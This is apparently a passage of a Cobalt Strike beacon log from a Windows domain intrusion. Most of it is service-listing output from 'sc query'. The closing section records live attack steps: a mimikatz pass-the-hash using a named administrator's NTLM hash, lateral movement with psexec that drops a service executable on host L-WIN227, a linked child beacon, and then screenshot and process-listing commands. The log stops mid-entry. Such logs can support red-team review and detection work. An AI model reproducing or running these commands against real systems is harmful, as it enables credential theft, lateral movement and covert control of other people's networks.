TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: gpsvc +DISPLAY_NAME: Group Policy Client + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_PRESHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: IKEEXT +DISPLAY_NAME: IKE and AuthIP IPsec Keying Modules + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: iphlpsvc +DISPLAY_NAME: IP Helper + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: KeyIso +DISPLAY_NAME: CNG Key Isolation + TYPE : 20 WIN32_SHARE_PROCESS + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: LanmanServer +DISPLAY_NAME: Server + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: LanmanWorkstation +DISPLAY_NAME: Workstation + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: lmhosts +DISPLAY_NAME: TCP/IP NetBIOS Helper + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: LSM +DISPLAY_NAME: Local Session Manager + TYPE : 30 WIN32 + STATE : 4 RUNNING + (NOT_STOPPABLE, NOT_PAUSABLE, 
IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: mpssvc +DISPLAY_NAME: Windows Defender Firewall + TYPE : 20 WIN32_SHARE_PROCESS + STATE : 4 RUNNING + (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: NcbService +DISPLAY_NAME: Network Connection Broker + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: Netlogon +DISPLAY_NAME: Netlogon + TYPE : 20 WIN32_SHARE_PROCESS + STATE : 4 RUNNING + (STOPPABLE, PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: netprofm +DISPLAY_NAME: Network List Service + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: NgcCtnrSvc +DISPLAY_NAME: Microsoft Passport Container + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_PRESHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: NlaSvc +DISPLAY_NAME: Network Location Awareness + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: nsi +DISPLAY_NAME: Network Store Interface Service + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: pla +DISPLAY_NAME: Performance Logs & Alerts + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + 
WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: PlugPlay +DISPLAY_NAME: Plug and Play + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: PolicyAgent +DISPLAY_NAME: IPsec Policy Agent + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: Power +DISPLAY_NAME: Power + TYPE : 20 WIN32_SHARE_PROCESS + STATE : 4 RUNNING + (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: ProfSvc +DISPLAY_NAME: User Profile Service + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: RdAgent +DISPLAY_NAME: RdAgent + TYPE : 10 WIN32_OWN_PROCESS + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: RpcEptMapper +DISPLAY_NAME: RPC Endpoint Mapper + TYPE : 20 WIN32_SHARE_PROCESS + STATE : 4 RUNNING + (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: RpcSs +DISPLAY_NAME: Remote Procedure Call (RPC) + TYPE : 20 WIN32_SHARE_PROCESS + STATE : 4 RUNNING + (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: SamSs +DISPLAY_NAME: Security Accounts Manager + TYPE : 20 WIN32_SHARE_PROCESS + STATE : 4 RUNNING + (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 
0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: Schedule +DISPLAY_NAME: Task Scheduler + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: SecurityHealthService +DISPLAY_NAME: Windows Security Service + TYPE : 10 WIN32_OWN_PROCESS + STATE : 4 RUNNING + (NOT_STOPPABLE, NOT_PAUSABLE, ACCEPTS_PRESHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: SENS +DISPLAY_NAME: System Event Notification Service + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: SessionEnv +DISPLAY_NAME: Remote Desktop Configuration + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: SgrmBroker +DISPLAY_NAME: System Guard Runtime Monitor Broker + TYPE : 10 WIN32_OWN_PROCESS + STATE : 4 RUNNING + (NOT_STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: ShellHWDetection +DISPLAY_NAME: Shell Hardware Detection + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: Spooler +DISPLAY_NAME: Print Spooler + TYPE : 110 WIN32_OWN_PROCESS (interactive) + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: SSDPSRV +DISPLAY_NAME: SSDP Discovery + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, 
ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: StateRepository +DISPLAY_NAME: State Repository Service + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: StorSvc +DISPLAY_NAME: Storage Service + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: SysMain +DISPLAY_NAME: SysMain + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: sysmon64 +DISPLAY_NAME: sysmon64 + TYPE : 10 WIN32_OWN_PROCESS + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: SystemEventsBroker +DISPLAY_NAME: System Events Broker + TYPE : 20 WIN32_SHARE_PROCESS + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: TabletInputService +DISPLAY_NAME: Touch Keyboard and Handwriting Panel Service + TYPE : 30 WIN32 + STATE : 4 RUNNING + (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: TermService +DISPLAY_NAME: Remote Desktop Services + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: Themes +DISPLAY_NAME: Themes + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + 
WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: TimeBrokerSvc +DISPLAY_NAME: Time Broker + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: TokenBroker +DISPLAY_NAME: Web Account Manager + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: TrkWks +DISPLAY_NAME: Distributed Link Tracking Client + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: UmRdpService +DISPLAY_NAME: Remote Desktop Services UserMode Port Redirector + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: UserManager +DISPLAY_NAME: User Manager + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: UsoSvc +DISPLAY_NAME: Update Orchestrator Service + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: VaultSvc +DISPLAY_NAME: Credential Manager + TYPE : 20 WIN32_SHARE_PROCESS + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: vmicheartbeat +DISPLAY_NAME: Hyper-V Heartbeat Service + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, PAUSABLE, IGNORES_SHUTDOWN) + 
WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: vmickvpexchange +DISPLAY_NAME: Hyper-V Data Exchange Service + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: vmicrdv +DISPLAY_NAME: Hyper-V Remote Desktop Virtualization Service + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: vmicshutdown +DISPLAY_NAME: Hyper-V Guest Shutdown Service + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: vmictimesync +DISPLAY_NAME: Hyper-V Time Synchronization Service + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: vmicvss +DISPLAY_NAME: Hyper-V Volume Shadow Copy Requestor + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, PAUSABLE, ACCEPTS_PRESHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: VSS +DISPLAY_NAME: Volume Shadow Copy + TYPE : 10 WIN32_OWN_PROCESS + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: W32Time +DISPLAY_NAME: Windows Time + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: Wcmsvc +DISPLAY_NAME: Windows Connection Manager + TYPE : 10 WIN32_OWN_PROCESS + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, 
ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: WdiServiceHost +DISPLAY_NAME: Diagnostic Service Host + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: WinDefend +DISPLAY_NAME: Windows Defender Antivirus Service + TYPE : 10 WIN32_OWN_PROCESS + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: WindowsAzureGuestAgent +DISPLAY_NAME: Windows Azure Guest Agent + TYPE : 10 WIN32_OWN_PROCESS + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: WindowsAzureNetAgentSvc +DISPLAY_NAME: Windows Azure Network Agent + TYPE : 10 WIN32_OWN_PROCESS + STATE : 4 RUNNING + (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: WindowsAzureTelemetryService +DISPLAY_NAME: Windows Azure Telemetry Service + TYPE : 10 WIN32_OWN_PROCESS + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: WinHttpAutoProxySvc +DISPLAY_NAME: WinHTTP Web Proxy Auto-Discovery Service + TYPE : 30 WIN32 + STATE : 4 RUNNING + (NOT_STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: Winmgmt +DISPLAY_NAME: Windows Management Instrumentation + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + 
+SERVICE_NAME: WinRM +DISPLAY_NAME: Windows Remote Management (WS-Management) + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: WpnService +DISPLAY_NAME: Windows Push Notifications System Service + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: wscsvc +DISPLAY_NAME: Security Center + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: WSearch +DISPLAY_NAME: Windows Search + TYPE : 10 WIN32_OWN_PROCESS + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: cbdhsvc_12420b +DISPLAY_NAME: Clipboard User Service_12420b + TYPE : f0 ERROR + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: CDPUserSvc_12420b +DISPLAY_NAME: Connected Devices Platform User Service_12420b + TYPE : f0 ERROR + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: OneSyncSvc_12420b +DISPLAY_NAME: Sync Host_12420b + TYPE : e0 USER_SHARE_PROCESS INSTANCE + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: WpnUserService_12420b +DISPLAY_NAME: Windows Push Notifications User Service_12420b + TYPE : f0 ERROR + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_PRESHUTDOWN) + 
WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + + +03/30 08:59:52 UTC [input] run sc query netsrv +03/30 08:59:52 UTC [task] Tasked beacon to run: sc query netsrv +03/30 08:59:55 UTC [checkin] host called home, sent: 33 bytes +03/30 08:59:55 UTC [output] +received output: + +SERVICE_NAME: netsrv + TYPE : 10 WIN32_OWN_PROCESS + STATE : 1 STOPPED + WIN32_EXIT_CODE : 1077 (0x435) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + + +03/30 09:00:20 UTC [input] run sc start netsrv +03/30 09:00:20 UTC [task] Tasked beacon to run: sc start netsrv +03/30 09:00:23 UTC [checkin] host called home, sent: 33 bytes +03/30 09:00:23 UTC [output] +received output: + +SERVICE_NAME: netsrv + TYPE : 10 WIN32_OWN_PROCESS + STATE : 2 START_PENDING + (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x7d0 + PID : 5880 + FLAGS : + + +03/30 09:03:59 UTC [input] rev2self +03/30 09:03:59 UTC [task] Tasked beacon to revert token +03/30 09:03:59 UTC [input] pth STROOP\admin-W.Trommel e4a22d8e7bbec871b341c88c2e94cba2 +03/30 09:04:00 UTC [task] Tasked beacon to run mimikatz's sekurlsa::pth /user:admin-W.Trommel /domain:STROOP /ntlm:e4a22d8e7bbec871b341c88c2e94cba2 /run:"%COMSPEC% /c echo fb52ae3c198 > \\.\pipe\b2ebc7" command +03/30 09:04:00 UTC [input] jump psexec64 L-WIN227 smb +03/30 09:04:00 UTC [task] Tasked beacon to run windows/beacon_bind_pipe (\\.\pipe\msagent_2ebf) on L-WIN227 via Service Control Manager (\\L-WIN227\ADMIN$\203b554.exe) +03/30 09:04:00 UTC [indicator] service: \\L-WIN227 203b554 +03/30 09:04:00 UTC [indicator] file: 10ba5a6a5e0316fedf7fd10d257b3f91 289280 bytes \\L-WIN227\ADMIN$\203b554.exe +03/30 09:04:03 UTC [checkin] host called home, sent: 706862 bytes +03/30 09:04:07 UTC [output] +Impersonated STROOP\W.Tax + +03/30 09:04:07 UTC [output] +received output: +Started service 203b554 on L-WIN227 + +03/30 09:04:07 UTC 
[output] +established link to child beacon: 10.1.4.10 + +03/30 09:04:07 UTC [output] +received output: +user : admin-W.Trommel +domain : STROOP +program : C:\windows\system32\cmd.exe /c echo fb52ae3c198 > \\.\pipe\b2ebc7 +impers. : no +NTLM : e4a22d8e7bbec871b341c88c2e94cba2 + | PID 376 + | TID 7096 + | LSA Process is now R/W + | LUID 0 ; 2756941 (00000000:002a114d) + \_ msv1_0 - data copy @ 0000013F1A4BC280 : OK ! + \_ kerberos - data copy @ 0000013F1A4CE8D8 + \_ aes256_hmac -> null + \_ aes128_hmac -> null + \_ rc4_hmac_nt OK + \_ rc4_hmac_old OK + \_ rc4_md4 OK + \_ rc4_hmac_nt_exp OK + \_ rc4_hmac_old_exp OK + \_ *Password replace @ 0000013F1A02BA58 (32) -> null + + +03/30 09:04:37 UTC [input] screenshot +03/30 09:04:37 UTC [task] Tasked beacon to take screenshot +03/30 09:04:38 UTC [input] ps +03/30 09:04:38 UTC [task] Tasked beacon to list processes +03/30 09:04:46 UTC [checkin] host called home, sent: 197210 bytes +03/30 09:04:53 